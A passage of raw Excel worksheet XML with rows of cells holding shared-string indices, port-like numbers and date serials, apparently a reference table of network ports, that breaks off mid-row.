    <row r="11697" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11697" t="s">
        <v>16835</v>
      </c>
      <c r="D11697" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11698" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11698" t="s">
        <v>16836</v>
      </c>
      <c r="B11698">
        <v>9987</v>
      </c>
      <c r="C11698" t="s">
        <v>1345</v>
      </c>
      <c r="D11698" t="s">
        <v>16837</v>
      </c>
      <c r="E11698" t="s">
        <v>16838</v>
      </c>
      <c r="F11698" t="s">
        <v>16838</v>
      </c>
      <c r="G11698" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="11699" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11699" t="s">
        <v>16836</v>
      </c>
      <c r="B11699">
        <v>9987</v>
      </c>
      <c r="C11699" t="s">
        <v>1348</v>
      </c>
      <c r="D11699" t="s">
        <v>16837</v>
      </c>
      <c r="E11699" t="s">
        <v>16838</v>
      </c>
      <c r="F11699" t="s">
        <v>16838</v>
      </c>
      <c r="G11699" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="11700" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11700" t="s">
        <v>16839</v>
      </c>
      <c r="B11700">
        <v>9988</v>
      </c>
      <c r="C11700" t="s">
        <v>1345</v>
      </c>
      <c r="D11700" t="s">
        <v>16840</v>
      </c>
      <c r="E11700" t="s">
        <v>16841</v>
      </c>
      <c r="F11700" t="s">
        <v>16841</v>
      </c>
      <c r="G11700">
        <v>39849</v>
      </c>
    </row>
    <row r="11701" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11701">
        <v>9988</v>
      </c>
      <c r="C11701" t="s">
        <v>1348</v>
      </c>
      <c r="D11701" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11702" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11702" t="s">
        <v>16842</v>
      </c>
      <c r="D11702" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11703" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11703" t="s">
        <v>16843</v>
      </c>
      <c r="B11703">
        <v>9990</v>
      </c>
      <c r="C11703" t="s">
        <v>1345</v>
      </c>
      <c r="D11703" t="s">
        <v>16844</v>
      </c>
      <c r="E11703" t="s">
        <v>16845</v>
      </c>
      <c r="F11703" t="s">
        <v>16845</v>
      </c>
      <c r="G11703" t="s">
        <v>10552</v>
      </c>
    </row>
    <row r="11704" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11704" t="s">
        <v>16843</v>
      </c>
      <c r="B11704">
        <v>9990</v>
      </c>
      <c r="C11704" t="s">
        <v>1348</v>
      </c>
      <c r="D11704" t="s">
        <v>16844</v>
      </c>
      <c r="E11704" t="s">
        <v>16845</v>
      </c>
      <c r="F11704" t="s">
        <v>16845</v>
      </c>
      <c r="G11704" t="s">
        <v>10552</v>
      </c>
    </row>
    <row r="11705" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11705" t="s">
        <v>16846</v>
      </c>
      <c r="B11705">
        <v>9991</v>
      </c>
      <c r="C11705" t="s">
        <v>1345</v>
      </c>
      <c r="D11705" t="s">
        <v>16847</v>
      </c>
      <c r="E11705" t="s">
        <v>16845</v>
      </c>
      <c r="F11705" t="s">
        <v>16845</v>
      </c>
      <c r="G11705" t="s">
        <v>10552</v>
      </c>
    </row>
    <row r="11706" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11706" t="s">
        <v>16846</v>
      </c>
      <c r="B11706">
        <v>9991</v>
      </c>
      <c r="C11706" t="s">
        <v>1348</v>
      </c>
      <c r="D11706" t="s">
        <v>16847</v>
      </c>
      <c r="E11706" t="s">
        <v>16845</v>
      </c>
      <c r="F11706" t="s">
        <v>16845</v>
      </c>
      <c r="G11706" t="s">
        <v>10552</v>
      </c>
    </row>
    <row r="11707" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11707" t="s">
        <v>16848</v>
      </c>
      <c r="B11707">
        <v>9992</v>
      </c>
      <c r="C11707" t="s">
        <v>1345</v>
      </c>
      <c r="D11707" t="s">
        <v>16849</v>
      </c>
      <c r="E11707" t="s">
        <v>16850</v>
      </c>
      <c r="F11707" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11708" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11708" t="s">
        <v>16848</v>
      </c>
      <c r="B11708">
        <v>9992</v>
      </c>
      <c r="C11708" t="s">
        <v>1348</v>
      </c>
      <c r="D11708" t="s">
        <v>16849</v>
      </c>
      <c r="E11708" t="s">
        <v>16850</v>
      </c>
      <c r="F11708" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11709" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11709" t="s">
        <v>16851</v>
      </c>
      <c r="B11709">
        <v>9993</v>
      </c>
      <c r="C11709" t="s">
        <v>1345</v>
      </c>
      <c r="D11709" t="s">
        <v>16852</v>
      </c>
      <c r="E11709" t="s">
        <v>16850</v>
      </c>
      <c r="F11709" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11710" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11710" t="s">
        <v>16851</v>
      </c>
      <c r="B11710">
        <v>9993</v>
      </c>
      <c r="C11710" t="s">
        <v>1348</v>
      </c>
      <c r="D11710" t="s">
        <v>16852</v>
      </c>
      <c r="E11710" t="s">
        <v>16850</v>
      </c>
      <c r="F11710" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11711" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11711" t="s">
        <v>16853</v>
      </c>
      <c r="B11711">
        <v>9994</v>
      </c>
      <c r="C11711" t="s">
        <v>1345</v>
      </c>
      <c r="D11711" t="s">
        <v>16854</v>
      </c>
      <c r="E11711" t="s">
        <v>16850</v>
      </c>
      <c r="F11711" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11712" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11712" t="s">
        <v>16853</v>
      </c>
      <c r="B11712">
        <v>9994</v>
      </c>
      <c r="C11712" t="s">
        <v>1348</v>
      </c>
      <c r="D11712" t="s">
        <v>16854</v>
      </c>
      <c r="E11712" t="s">
        <v>16850</v>
      </c>
      <c r="F11712" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11713" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11713" t="s">
        <v>16855</v>
      </c>
      <c r="B11713">
        <v>9995</v>
      </c>
      <c r="C11713" t="s">
        <v>1345</v>
      </c>
      <c r="D11713" t="s">
        <v>16856</v>
      </c>
      <c r="E11713" t="s">
        <v>16850</v>
      </c>
      <c r="F11713" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11714" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11714" t="s">
        <v>16855</v>
      </c>
      <c r="B11714">
        <v>9995</v>
      </c>
      <c r="C11714" t="s">
        <v>1348</v>
      </c>
      <c r="D11714" t="s">
        <v>16856</v>
      </c>
      <c r="E11714" t="s">
        <v>16850</v>
      </c>
      <c r="F11714" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11715" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11715" t="s">
        <v>16857</v>
      </c>
      <c r="B11715">
        <v>9996</v>
      </c>
      <c r="C11715" t="s">
        <v>1345</v>
      </c>
      <c r="D11715" t="s">
        <v>16858</v>
      </c>
      <c r="E11715" t="s">
        <v>16850</v>
      </c>
      <c r="F11715" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11716" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11716" t="s">
        <v>16857</v>
      </c>
      <c r="B11716">
        <v>9996</v>
      </c>
      <c r="C11716" t="s">
        <v>1348</v>
      </c>
      <c r="D11716" t="s">
        <v>16858</v>
      </c>
      <c r="E11716" t="s">
        <v>16850</v>
      </c>
      <c r="F11716" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11717" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11717" t="s">
        <v>16859</v>
      </c>
      <c r="B11717">
        <v>9997</v>
      </c>
      <c r="C11717" t="s">
        <v>1345</v>
      </c>
      <c r="D11717" t="s">
        <v>16860</v>
      </c>
      <c r="E11717" t="s">
        <v>16850</v>
      </c>
      <c r="F11717" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11718" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11718" t="s">
        <v>16859</v>
      </c>
      <c r="B11718">
        <v>9997</v>
      </c>
      <c r="C11718" t="s">
        <v>1348</v>
      </c>
      <c r="D11718" t="s">
        <v>16860</v>
      </c>
      <c r="E11718" t="s">
        <v>16850</v>
      </c>
      <c r="F11718" t="s">
        <v>16850</v>
      </c>
    </row>
    <row r="11719" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11719" t="s">
        <v>16861</v>
      </c>
      <c r="B11719">
        <v>9998</v>
      </c>
      <c r="C11719" t="s">
        <v>1345</v>
      </c>
      <c r="D11719" t="s">
        <v>16862</v>
      </c>
      <c r="E11719" t="s">
        <v>16863</v>
      </c>
      <c r="F11719" t="s">
        <v>16863</v>
      </c>
    </row>
    <row r="11720" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11720" t="s">
        <v>16861</v>
      </c>
      <c r="B11720">
        <v>9998</v>
      </c>
      <c r="C11720" t="s">
        <v>1348</v>
      </c>
      <c r="D11720" t="s">
        <v>16862</v>
      </c>
      <c r="E11720" t="s">
        <v>16863</v>
      </c>
      <c r="F11720" t="s">
        <v>16863</v>
      </c>
    </row>
    <row r="11721" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11721" t="s">
        <v>16864</v>
      </c>
      <c r="B11721">
        <v>9999</v>
      </c>
      <c r="C11721" t="s">
        <v>1345</v>
      </c>
      <c r="D11721" t="s">
        <v>16864</v>
      </c>
      <c r="E11721" t="s">
        <v>16863</v>
      </c>
      <c r="F11721" t="s">
        <v>16863</v>
      </c>
    </row>
    <row r="11722" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11722" t="s">
        <v>16864</v>
      </c>
      <c r="B11722">
        <v>9999</v>
      </c>
      <c r="C11722" t="s">
        <v>1348</v>
      </c>
      <c r="D11722" t="s">
        <v>16864</v>
      </c>
      <c r="E11722" t="s">
        <v>16863</v>
      </c>
      <c r="F11722" t="s">
        <v>16863</v>
      </c>
    </row>
    <row r="11723" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11723" t="s">
        <v>16865</v>
      </c>
      <c r="B11723">
        <v>10000</v>
      </c>
      <c r="C11723" t="s">
        <v>1345</v>
      </c>
      <c r="D11723" t="s">
        <v>16866</v>
      </c>
      <c r="E11723" t="s">
        <v>16867</v>
      </c>
      <c r="F11723" t="s">
        <v>16867</v>
      </c>
    </row>
    <row r="11724" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11724" t="s">
        <v>16865</v>
      </c>
      <c r="B11724">
        <v>10000</v>
      </c>
      <c r="C11724" t="s">
        <v>1348</v>
      </c>
      <c r="D11724" t="s">
        <v>16866</v>
      </c>
      <c r="E11724" t="s">
        <v>16867</v>
      </c>
      <c r="F11724" t="s">
        <v>16867</v>
      </c>
    </row>
    <row r="11725" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11725" t="s">
        <v>16868</v>
      </c>
      <c r="B11725">
        <v>10001</v>
      </c>
      <c r="C11725" t="s">
        <v>1345</v>
      </c>
      <c r="D11725" t="s">
        <v>16869</v>
      </c>
      <c r="E11725" t="s">
        <v>16870</v>
      </c>
      <c r="F11725" t="s">
        <v>16870</v>
      </c>
      <c r="G11725">
        <v>40396</v>
      </c>
    </row>
    <row r="11726" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11726" t="s">
        <v>16868</v>
      </c>
      <c r="B11726">
        <v>10001</v>
      </c>
      <c r="C11726" t="s">
        <v>1348</v>
      </c>
      <c r="D11726" t="s">
        <v>16869</v>
      </c>
      <c r="E11726" t="s">
        <v>16870</v>
      </c>
      <c r="F11726" t="s">
        <v>16870</v>
      </c>
      <c r="G11726">
        <v>40396</v>
      </c>
    </row>
    <row r="11727" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11727" t="s">
        <v>16871</v>
      </c>
      <c r="B11727">
        <v>10002</v>
      </c>
      <c r="C11727" t="s">
        <v>1345</v>
      </c>
      <c r="D11727" t="s">
        <v>16872</v>
      </c>
      <c r="E11727" t="s">
        <v>16873</v>
      </c>
      <c r="F11727" t="s">
        <v>16873</v>
      </c>
      <c r="G11727">
        <v>39282</v>
      </c>
    </row>
    <row r="11728" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11728" t="s">
        <v>16871</v>
      </c>
      <c r="B11728">
        <v>10002</v>
      </c>
      <c r="C11728" t="s">
        <v>1348</v>
      </c>
      <c r="D11728" t="s">
        <v>16872</v>
      </c>
      <c r="E11728" t="s">
        <v>16873</v>
      </c>
      <c r="F11728" t="s">
        <v>16873</v>
      </c>
      <c r="G11728">
        <v>39282</v>
      </c>
    </row>
    <row r="11729" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11729" t="s">
        <v>16874</v>
      </c>
      <c r="B11729">
        <v>10003</v>
      </c>
      <c r="C11729" t="s">
        <v>1345</v>
      </c>
      <c r="D11729" t="s">
        <v>16875</v>
      </c>
      <c r="E11729" t="s">
        <v>16873</v>
      </c>
      <c r="F11729" t="s">
        <v>16873</v>
      </c>
      <c r="G11729">
        <v>39282</v>
      </c>
    </row>
    <row r="11730" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11730" t="s">
        <v>16876</v>
      </c>
      <c r="B11730">
        <v>10003</v>
      </c>
      <c r="C11730" t="s">
        <v>1345</v>
      </c>
      <c r="D11730" t="s">
        <v>16872</v>
      </c>
      <c r="E11730" t="s">
        <v>16873</v>
      </c>
      <c r="F11730" t="s">
        <v>16873</v>
      </c>
      <c r="G11730">
        <v>39282</v>
      </c>
      <c r="L11730" t="s">
        <v>16877</v>
      </c>
    </row>
    <row r="11731" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11731" t="s">
        <v>16874</v>
      </c>
      <c r="B11731">
        <v>10003</v>
      </c>
      <c r="C11731" t="s">
        <v>1348</v>
      </c>
      <c r="D11731" t="s">
        <v>16875</v>
      </c>
      <c r="E11731" t="s">
        <v>16873</v>
      </c>
      <c r="F11731" t="s">
        <v>16873</v>
      </c>
      <c r="G11731">
        <v>39282</v>
      </c>
    </row>
    <row r="11732" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11732" t="s">
        <v>16876</v>
      </c>
      <c r="B11732">
        <v>10003</v>
      </c>
      <c r="C11732" t="s">
        <v>1348</v>
      </c>
      <c r="D11732" t="s">
        <v>16872</v>
      </c>
      <c r="E11732" t="s">
        <v>16873</v>
      </c>
      <c r="F11732" t="s">
        <v>16873</v>
      </c>
      <c r="G11732">
        <v>39282</v>
      </c>
      <c r="L11732" t="s">
        <v>16877</v>
      </c>
    </row>
    <row r="11733" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11733" t="s">
        <v>16878</v>
      </c>
      <c r="B11733">
        <v>10004</v>
      </c>
      <c r="C11733" t="s">
        <v>1345</v>
      </c>
      <c r="D11733" t="s">
        <v>16879</v>
      </c>
      <c r="E11733" t="s">
        <v>16880</v>
      </c>
      <c r="F11733" t="s">
        <v>16880</v>
      </c>
      <c r="G11733">
        <v>39608</v>
      </c>
    </row>
    <row r="11734" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B11734">
        <v>10004</v>
      </c>
      <c r="C11734" t="s">
        <v>1348</v>
      </c>
      <c r="D11734" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11735" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11735" t="s">
        <v>16881</v>
      </c>
      <c r="B11735">
        <v>10005</v>
      </c>
      <c r="C11735" t="s">
        <v>1345</v>
      </c>
      <c r="D11735" t="s">
        <v>16882</v>
      </c>
      <c r="E11735" t="s">
        <v>16880</v>
      </c>
      <c r="F11735" t="s">
        <v>16880</v>
      </c>
      <c r="G11735">
        <v>39608</v>
      </c>
    </row>
    <row r="11736" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B11736">
        <v>10005</v>
      </c>
      <c r="C11736" t="s">
        <v>1348</v>
      </c>
      <c r="D11736" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11737" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11737" t="s">
        <v>16883</v>
      </c>
      <c r="B11737">
        <v>10006</v>
      </c>
      <c r="C11737" t="s">
        <v>1345</v>
      </c>
      <c r="D11737" t="s">
        <v>16884</v>
      </c>
      <c r="E11737" t="s">
        <v>16885</v>
      </c>
      <c r="F11737" t="s">
        <v>16886</v>
      </c>
      <c r="G11737">
        <v>41858</v>
      </c>
    </row>
    <row r="11738" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B11738">
        <v>10006</v>
      </c>
      <c r="C11738" t="s">
        <v>1348</v>
      </c>
      <c r="D11738" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11739" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11739" t="s">
        <v>16887</v>
      </c>
      <c r="B11739">
        <v>10007</v>
      </c>
      <c r="C11739" t="s">
        <v>1345</v>
      </c>
      <c r="D11739" t="s">
        <v>16888</v>
      </c>
      <c r="E11739" t="s">
        <v>16889</v>
      </c>
      <c r="F11739" t="s">
        <v>16889</v>
      </c>
    </row>
    <row r="11740" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11740" t="s">
        <v>16887</v>
      </c>
      <c r="B11740">
        <v>10007</v>
      </c>
      <c r="C11740" t="s">
        <v>1348</v>
      </c>
      <c r="D11740" t="s">
        <v>16888</v>
      </c>
      <c r="E11740" t="s">
        <v>16889</v>
      </c>
      <c r="F11740" t="s">
        <v>16889</v>
      </c>
    </row>
    <row r="11741" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11741" t="s">
        <v>16890</v>
      </c>
      <c r="B11741">
        <v>10008</v>
      </c>
      <c r="C11741" t="s">
        <v>1345</v>
      </c>
      <c r="D11741" t="s">
        <v>16891</v>
      </c>
      <c r="E11741" t="s">
        <v>16892</v>
      </c>
      <c r="F11741" t="s">
        <v>16892</v>
      </c>
      <c r="G11741" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="11742" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11742" t="s">
        <v>16890</v>
      </c>
      <c r="B11742">
        <v>10008</v>
      </c>
      <c r="C11742" t="s">
        <v>1348</v>
      </c>
      <c r="D11742" t="s">
        <v>16891</v>
      </c>
      <c r="E11742" t="s">
        <v>16892</v>
      </c>
      <c r="F11742" t="s">
        <v>16892</v>
      </c>
      <c r="G11742" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="11743" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11743" t="s">
        <v>16893</v>
      </c>
      <c r="B11743">
        <v>10009</v>
      </c>
      <c r="C11743" t="s">
        <v>1345</v>
      </c>
      <c r="D11743" t="s">
        <v>16894</v>
      </c>
      <c r="E11743" t="s">
        <v>16895</v>
      </c>
      <c r="F11743" t="s">
        <v>16895</v>
      </c>
      <c r="G11743" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="11744" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A11744" t="s">
        <v>16893</v>
      </c>
      <c r="B11744">
        <v>10009</v>
      </c>
      <c r="C11744" t="s">
        <v>1348</v>
      </c>
      <c r="D11744" t="s">
        <v>16894</v>
      </c>
      <c r="E11744" t="s">
        <v>16895</v>
      </c>
      <c r="F11744" t="s">
        <v>16895</v>
      </c>
      <c r="G11744" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="11745" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11745" t="s">
        <v>16896</v>
      </c>
      <c r="B11745">
        <v>10010</v>
      </c>
      <c r="C11745" t="s">
        <v>1345</v>
      </c>
      <c r="D11745" t="s">
        <v>16897</v>
      </c>
      <c r="E11745" t="s">
        <v>16898</v>
      </c>
      <c r="F11745" t="s">
        <v>16898</v>
      </c>
      <c r="G11745">
        <v>40018</v>
      </c>
    </row>
    <row r="11746" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11746">
        <v>10010</v>
      </c>
      <c r="C11746" t="s">
        <v>1348</v>
      </c>
      <c r="D11746" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11747" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11747" t="s">
        <v>16899</v>
      </c>
      <c r="D11747" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11748" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11748" t="s">
        <v>16900</v>
      </c>
      <c r="B11748">
        <v>10020</v>
      </c>
      <c r="C11748" t="s">
        <v>1345</v>
      </c>
      <c r="D11748" t="s">
        <v>16901</v>
      </c>
      <c r="E11748" t="s">
        <v>16902</v>
      </c>
      <c r="F11748" t="s">
        <v>16903</v>
      </c>
      <c r="G11748">
        <v>42822</v>
      </c>
    </row>
    <row r="11749" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11749">
        <v>10020</v>
      </c>
      <c r="C11749" t="s">
        <v>1348</v>
      </c>
      <c r="D11749" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11750" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11750" t="s">
        <v>16904</v>
      </c>
      <c r="D11750" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11751" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11751" t="s">
        <v>16905</v>
      </c>
      <c r="B11751">
        <v>10023</v>
      </c>
      <c r="C11751" t="s">
        <v>1348</v>
      </c>
      <c r="D11751" t="s">
        <v>16906</v>
      </c>
      <c r="E11751" t="s">
        <v>16907</v>
      </c>
      <c r="F11751" t="s">
        <v>16908</v>
      </c>
      <c r="G11751">
        <v>41662</v>
      </c>
    </row>
    <row r="11752" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11752">
        <v>10023</v>
      </c>
      <c r="C11752" t="s">
        <v>1345</v>
      </c>
      <c r="D11752" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11753" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11753" t="s">
        <v>16909</v>
      </c>
      <c r="D11753" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11754" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11754" t="s">
        <v>16910</v>
      </c>
      <c r="B11754">
        <v>10050</v>
      </c>
      <c r="C11754" t="s">
        <v>1345</v>
      </c>
      <c r="D11754" t="s">
        <v>16911</v>
      </c>
      <c r="E11754" t="s">
        <v>16912</v>
      </c>
      <c r="F11754" t="s">
        <v>16912</v>
      </c>
      <c r="G11754" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="11755" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11755" t="s">
        <v>16910</v>
      </c>
      <c r="B11755">
        <v>10050</v>
      </c>
      <c r="C11755" t="s">
        <v>1348</v>
      </c>
      <c r="D11755" t="s">
        <v>16911</v>
      </c>
      <c r="E11755" t="s">
        <v>16912</v>
      </c>
      <c r="F11755" t="s">
        <v>16912</v>
      </c>
      <c r="G11755" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="11756" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11756" t="s">
        <v>16913</v>
      </c>
      <c r="B11756">
        <v>10051</v>
      </c>
      <c r="C11756" t="s">
        <v>1345</v>
      </c>
      <c r="D11756" t="s">
        <v>16914</v>
      </c>
      <c r="E11756" t="s">
        <v>16912</v>
      </c>
      <c r="F11756" t="s">
        <v>16912</v>
      </c>
      <c r="G11756" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="11757" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11757" t="s">
        <v>16913</v>
      </c>
      <c r="B11757">
        <v>10051</v>
      </c>
      <c r="C11757" t="s">
        <v>1348</v>
      </c>
      <c r="D11757" t="s">
        <v>16914</v>
      </c>
      <c r="E11757" t="s">
        <v>16912</v>
      </c>
      <c r="F11757" t="s">
        <v>16912</v>
      </c>
      <c r="G11757" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="11758" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11758" t="s">
        <v>16915</v>
      </c>
      <c r="D11758" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11759" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11759" t="s">
        <v>16916</v>
      </c>
      <c r="B11759">
        <v>10055</v>
      </c>
      <c r="C11759" t="s">
        <v>1345</v>
      </c>
      <c r="D11759" t="s">
        <v>16917</v>
      </c>
      <c r="E11759" t="s">
        <v>16918</v>
      </c>
      <c r="F11759" t="s">
        <v>16918</v>
      </c>
      <c r="G11759">
        <v>40360</v>
      </c>
    </row>
    <row r="11760" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11760">
        <v>10055</v>
      </c>
      <c r="C11760" t="s">
        <v>1348</v>
      </c>
      <c r="D11760" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="11761" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11761" t="s">
        <v>16919</v>
      </c>
      <c r="D11761" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11762" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11762" t="s">
        <v>16920</v>
      </c>
      <c r="B11762">
        <v>10080</v>
      </c>
      <c r="C11762" t="s">
        <v>1345</v>
      </c>
      <c r="D11762" t="s">
        <v>16921</v>
      </c>
      <c r="E11762" t="s">
        <v>16922</v>
      </c>
      <c r="F11762" t="s">
        <v>16922</v>
      </c>
    </row>
    <row r="11763" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11763" t="s">
        <v>16920</v>
      </c>
      <c r="B11763">
        <v>10080</v>
      </c>
      <c r="C11763" t="s">
        <v>1348</v>
      </c>
      <c r="D11763" t="s">
        <v>16921</v>
      </c>
      <c r="E11763" t="s">
        <v>16922</v>
      </c>
      <c r="F11763" t="s">
        <v>16922</v>
      </c>
    </row>
    <row r="11764" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11764" t="s">
        <v>16923</v>
      </c>
      <c r="B11764">
        <v>10081</v>
      </c>
      <c r="C11764" t="s">
        <v>1345</v>
      </c>
      <c r="D11764" t="s">
        <v>16924</v>
      </c>
      <c r="E11764" t="s">
        <v>16925</v>
      </c>
      <c r="F11764" t="s">
        <v>16925</v>
      </c>
      <c r="G11764" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="11765" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11765" t="s">
        <v>16923</v>
      </c>
      <c r="B11765">
        <v>10081</v>
      </c>
      <c r="C11765" t="s">
        <v>1348</v>
      </c>
      <c r="D11765" t="s">
        <v>16924</v>
      </c>
      <c r="E11765" t="s">
        <v>16925</v>
      </c>
      <c r="F11765" t="s">
        <v>16925</v>
      </c>
      <c r="G11765" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="11766" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B11766" t="s">
        <v>16926</v>
      </c>
      <c r="D11766" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="11767" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11767" t="s">
        <v>16927</v>
      </c>
      <c r="B11767">
        <v>10100</v>
      </c>
      <c r="C11767" t="s">
        <v>1345</v>
      </c>
      <c r="D11767" t="s">
        <v>16928</v>
      </c>
      <c r="E11767" t="s">
        <v>16929</v>
      </c>
      <c r="F11767" t="s">
        <v>16929</v>
      </c>
      <c r="G11767" t="s">
        <v>16930</v>
      </c>
    </row>
    <row r="11768" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11768" t="s">
        <v>16927</v>
      </c>
      <c r="B11768">
        <v>10100</v>
      </c>
      <c r="C11768" t="s">
        <v>1348</v>
      </c>
      <c r="D11768" t="s">
        <v>16928</v>
      </c>
      <c r="E11768" t="s">
        <v>16929</v>
      </c>
      <c r="F11768" t="s">
        <v>16929</v>
      </c>
      <c r="G11768" t="s">
        <v>16930</v>
      </c>
    </row>
    <row r="11769" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11769" t="s">
        <v>16931</v>
      </c>
      <c r="B11769">
        <v>10101</v>
      </c>
      <c r="C11769" t="s">
        <v>1345</v>
      </c>
      <c r="D11769" t="s">
        <v>16932</v>
      </c>
      <c r="E11769" t="s">
        <v>16933</v>
      </c>
      <c r="F11769" t="s">
        <v>16933</v>
      </c>
      <c r="G11769" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="11770" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11770" t="s">
        <v>16931</v>
      </c>
      <c r="B11770">
        <v>10101</v>
      </c>
      <c r="C11770" t="s">
        <v>1348</v>
      </c>
      <c r="D11770" t="s">
        <v>16932</v>
      </c>
      <c r="E11770" t="s">
        <v>16933</v>
      </c>
      <c r="F11770" t="s">
        <v>16933</v>
      </c>
      <c r="G11770" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="11771" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11771" t="s">
        <v>16934</v>
      </c>
      <c r="B11771">
        <v>10102</v>
      </c>
      <c r="C11771" t="s">
        <v>1345</v>
      </c>
      <c r="D11771" t="s">
        <v>16935</v>
      </c>
      <c r="E11771" t="s">
        <v>16933</v>
      </c>
      <c r="F11771" t="s">
        <v>16933</v>
      </c>
      <c r="G11771" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="11772" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11772" t="s">
        <v>16934</v>
      </c>
      <c r="B11772">
